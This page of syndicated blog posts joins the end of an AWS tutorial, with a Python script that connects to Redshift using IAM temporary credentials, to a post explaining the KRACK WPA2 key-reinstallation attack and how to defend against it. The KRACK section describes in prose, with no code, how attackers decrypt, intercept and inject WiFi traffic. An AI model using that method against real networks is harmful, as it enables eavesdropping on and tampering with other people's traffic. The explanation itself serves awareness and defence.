    * Licensed under the Amazon Software License (the "License").
    * You may not use this file except in compliance with the License.
    * A copy of the License is located at
    *
    * http://aws.amazon.com/asl/
    *
    * or in the "license" file accompanying this file. This file is distributed
    * on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
    * express or implied. See the License for the specific language governing
    * permissions and limitations under the License.
    """
    
    import sys
    import pg
    import boto3
    
    REGION = 'us-west-2'
    CLUSTER_IDENTIFIER = 'examplecorp-dw'
    DB_NAME = 'sales_db'
    DB_USER = 'examplecorpsalespartner'
    
    options = """keepalives=1 keepalives_idle=200 keepalives_interval=200
                 keepalives_count=6"""
    
    set_timeout_stmt = "set statement_timeout = 1200000"
    
    def conn_to_rs(host, port, db, usr, pwd, opt=options, timeout=set_timeout_stmt):
        rs_conn_string = """host=%s port=%s dbname=%s user=%s password=%s
                             %s""" % (host, port, db, usr, pwd, opt)
        print "Connecting to %s:%s:%s as %s" % (host, port, db, usr)
        rs_conn = pg.connect(dbname=rs_conn_string)
        rs_conn.query(timeout)
        return rs_conn
    
    def main():
        # describe the cluster and fetch the IAM temporary credentials
        global redshift_client
        redshift_client = boto3.client('redshift', region_name=REGION)
        response_cluster_details = redshift_client.describe_clusters(ClusterIdentifier=CLUSTER_IDENTIFIER)
        response_credentials = redshift_client.get_cluster_credentials(DbUser=DB_USER,DbName=DB_NAME,ClusterIdentifier=CLUSTER_IDENTIFIER,DurationSeconds=3600)
        rs_host = response_cluster_details['Clusters'][0]['Endpoint']['Address']
        rs_port = response_cluster_details['Clusters'][0]['Endpoint']['Port']
        rs_db = DB_NAME
        rs_iam_user = response_credentials['DbUser']
        rs_iam_pwd = response_credentials['DbPassword']
        # connect to the Amazon Redshift cluster
        conn = conn_to_rs(rs_host, rs_port, rs_db, rs_iam_user,rs_iam_pwd)
        # execute a query
        result = conn.query("SELECT sysdate as dt")
        # fetch results from the query
        for dt_val in result.getresult() :
            print dt_val
        # close the Amazon Redshift connection
        conn.close()
    
    if __name__ == "__main__":
        main()

You can save this Python program in a file (redshiftscript.py) and execute it at the command line as ec2-user:

python redshiftscript.py

Now partners can connect to the Amazon Redshift cluster using the Python script, and authentication is federated through the IAM user.

Summary

In this post, I demonstrated how to use federated access using Active Directory and IAM roles to enable single sign-on to an Amazon Redshift cluster. I also showed how partners outside an organization can be managed easily using IAM credentials.  Using the GetClusterCredentials API action, now supported by Amazon Redshift, lets you manage a large number of database users and have them use corporate credentials to log in. You don’t have to maintain separate database user accounts.

Although this post demonstrated the integration of IAM with AD FS and Active Directory, you can replicate this solution across with your choice of SAML 2.0 third-party identity providers (IdP), such as PingFederate or Okta. For the different supported federation options, see Configure SAML Assertions for Your IdP.

If you have questions or suggestions, please comment below.


Additional Reading

Learn how to establish federated access to your AWS resources by using Active Directory user attributes.


About the Author

Thiyagarajan Arumugam is a Big Data Solutions Architect at Amazon Web Services and designs customer architectures to process data at scale. Prior to AWS, he built data warehouse solutions at Amazon.com. In his free time, he enjoys all outdoor sports and practices the Indian classical drum mridangam.

 

Some notes on the KRACK attack

Post Syndicated from Robert Graham original http://blog.erratasec.com/2017/10/some-notes-on-krack-attack.html

This is my interpretation of the KRACK attacks paper that describes a way of decrypting encrypted WiFi traffic with an active attack.

tl;dr: Wow. Everyone needs to be afraid. (Well, worried — not panicked.) It means in practice, attackers can decrypt a lot of wifi traffic, with varying levels of difficulty depending on your precise network setup. My post last July about the DEF CON network being safe was in error.

Details

This is not a crypto bug but a protocol bug (a pretty obvious and trivial protocol bug).
When a client connects to the network, the access-point will at some point send a random “key” data to use for encryption. Because this packet may be lost in transmission, it can be repeated many times.
What the hacker does is just repeatedly sends this packet, potentially hours later. Each time it does so, it resets the “keystream” back to the starting conditions. The obvious patch that device vendors will make is to only accept the first such packet it receives, ignore all the duplicates.
At this point, the protocol bug becomes a crypto bug. We know how to break crypto when we have two keystreams from the same starting position. It’s not always reliable, but reliable enough that people need to be afraid.
Android, though, is the biggest danger. Rather than simply replaying the packet, a packet with key data of all zeroes can be sent. This allows attackers to setup a fake WiFi access-point and man-in-the-middle all traffic.
In a related case, the access-point/base-station can sometimes also be attacked, affecting the stream sent to the client.
Not only is sniffing possible, but in some limited cases, injection. This allows the traditional attack of adding bad code to the end of HTML pages in order to trick users into installing a virus.

This is an active attack, not a passive attack, so in theory, it’s detectable.

Who is vulnerable?

Everyone, pretty much.
The hacker only needs to be within range of your WiFi. Your neighbor’s teenage kid is going to be downloading and running the tool in order to eavesdrop on your packets.
The hacker doesn’t need to be logged into your network.
It affects all WPA1/WPA2, the personal one with passwords that we use in home, and the enterprise version with certificates we use in enterprises.
It can’t defeat SSL/TLS or VPNs. Thus, if you feel your laptop is safe surfing the public WiFi at airports, then your laptop is still safe from this attack. With Android, it does allow running tools like sslstrip, which can fool many users.
Your home network is vulnerable. Many devices will be using SSL/TLS, so are fine, like your Amazon echo, which you can continue to use without worrying about this attack. Other devices, like your Phillips lightbulbs, may not be so protected.

How can I defend myself?

Patch.
More to the point, measure your current vendors by how long it takes them to patch. Throw away gear by those vendors that took a long time to patch and replace it with vendors that took a short time.
High-end access-points that contains “WIPS” (WiFi Intrusion Prevention Systems) features should be able to detect this and block vulnerable clients from connecting to the network (once the vendor upgrades the systems, of course). Even low-end access-points, like the $30 ones you get for home, can easily be updated to prevent packet sequence numbers from going back to the start (i.e. from the keystream resetting back to the start).
At some point, you’ll need to run the attack against yourself, to make sure all your devices are secure. Since you’ll be constantly allowing random phones to connect to your network, you’ll need to check their vulnerability status before connecting them. You’ll need to continue doing this for several years.
Of course, if you are using SSL/TLS for everything, then your danger is mitigated. This is yet another reason why you should be using SSL/TLS for internal communications.
Most security vendors will add things to their products/services to defend you. While valuable in some cases, it’s not a defense. The defense is patching the devices you know about, and preventing vulnerable devices from attaching to your network.
If I remember correctly, DEF CON uses Aruba. Aruba contains WIPS functionality, which means by the time DEF CON roles around again next year, they should have the feature to deny vulnerable devices from connecting, and specifically to detect an attack in progress and prevent further communication.
However, for an attacker near an Android device using a low-powered WiFi, it’s likely they will be able to conduct man-in-the-middle without any WIPS preventing them.